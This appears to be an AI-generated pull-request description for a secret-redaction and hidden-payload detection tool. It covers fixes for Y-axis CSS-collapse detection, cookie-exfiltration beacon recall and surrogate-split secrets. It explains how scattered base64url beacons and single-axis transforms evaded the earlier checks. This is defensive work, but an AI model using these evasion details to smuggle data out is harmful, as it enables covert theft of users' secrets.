`isHidingTransform` tested only the FIRST scale factor, so `scale(1,0)` / `scale3d(1,0,1)` / `matrix(1,0,0,0,…)` Y-axis collapses were treated as visible and their payloads survived. Now tests **both** axis factors — with the correct per-function indices: `matrix` uses index 3 (d), `matrix3d` uses index **5** (m22), **not** index 3 (which is m14, legitimately 0 on the identity matrix → would false-positive).

### Exfil beacon recall — base64url — `html.mjs`
`isBase64UrlBlob` required a contiguous 40-char alnum run, but ordinary base64url scatters `-`/`_` every ~30 chars, so a real `?d=<200-char base64url of cookies>` beacon dodged it. Replaced with a **character-mix test** (a bulk-encoded blob carries both an uppercase letter and a digit; a lowercase word-slug shows neither) — raises recall on scattered-separator beacons while keeping slugs benign (**precision-first**, per the detection-layer doctrine).

### Lone-surrogate normalization drift (class-eliminated) — `output.mjs`, `layer1.mjs`
The Layer-5 re-redact path did not normalize lone UTF-16 surrogates, unlike `processLayer1` — so a secret reconstituted across a surrogate at a Layer-5 deletion join (e.g. a split surrogate pair) survived redaction. Extracted one shared `normalizeLoneSurrogates()` used by **both** redact-input paths so they can't drift again. Corrected the `layer1.mjs` docstring (it claimed `applyLayer1` normalizes surrogates; it doesn't — the RE is exported for consumers to apply at the redactor/HTML boundary, which is what this does).

### Dead code — `prompt.mjs`
Removed `isSgrColorOnly`'s second conjunct (an exact duplicate of `isSgrOnly` over the same SGR-stripped string) and corrected its comment's false claim that `isSgrOnly` is blind to the C1 OSC introducer U+009D (its control class already covers the whole C1 block). Behavior unchanged.

## Verification
`node --test` — **1870 pass / 0 fail** (new regression rows in the hidden-style SSOT table + `checkExfilUrl` unit suite + an output re-redact test). `eslint`, `prettier --check`, `tsc --noEmit` all clean.

## Decisions made
- **One consolidated PR per repo** (against the audit's file-disjoint-parallel-PR doctrine) because CI runner load was explicitly prioritized. Cost accepted: one red check blocks every fix; review is harder. Mitigated with one Conventional Commit per bug class.
- **Base64url fix uses a character-mix discriminator, not a lower run threshold or a separator-density cutoff.** A density cutoff would false-positive on legit long slugs with long words (a hyphen every ~17 chars); the mix test excludes any lowercase-only slug outright, preserving precision while catching the scattered-separator blob.
- **Dropped audit finding (was flagged MEDIUM): Python cross-line eligibility "drift" for Groq/xAI/Replicate.** On implementation, `test_cross_line_eligibility_partitions_every_active_detector` **explicitly asserts these three are cross-line INELIGIBLE**, and a crossline behavior test confirmed making them eligible causes a false-positive redaction. Their exclusion is a deliberate, guarded decision (false-fusion risk in the newline-free collapse), not drift — so no change was made. (The plugin *registration* already derives from the JSON SSOT; only the cross-line curation is intentionally manual.)
- **Deferred (logged), lower-value / higher-ripple, kept out to protect the green-first-push goal:** Python URL opaque-run recall + CAPS placeholder backstop (behavior changes needing a negative corpus per the precision doctrine); `cleanFile`'s documented-`null` "payload preserved" signal (currently unreachable, latent); `decodeRun` report-completeness nits; `atomicReplaceFile` temp-file cleanup; CLI `cwd` validation; cf-charset generator emitting Prettier-final bytes; test-realness hardening (coverage gates that prove textual presence not payload exercise).

🤖 Generated with [Claude Code](https://claude.com/claude-code)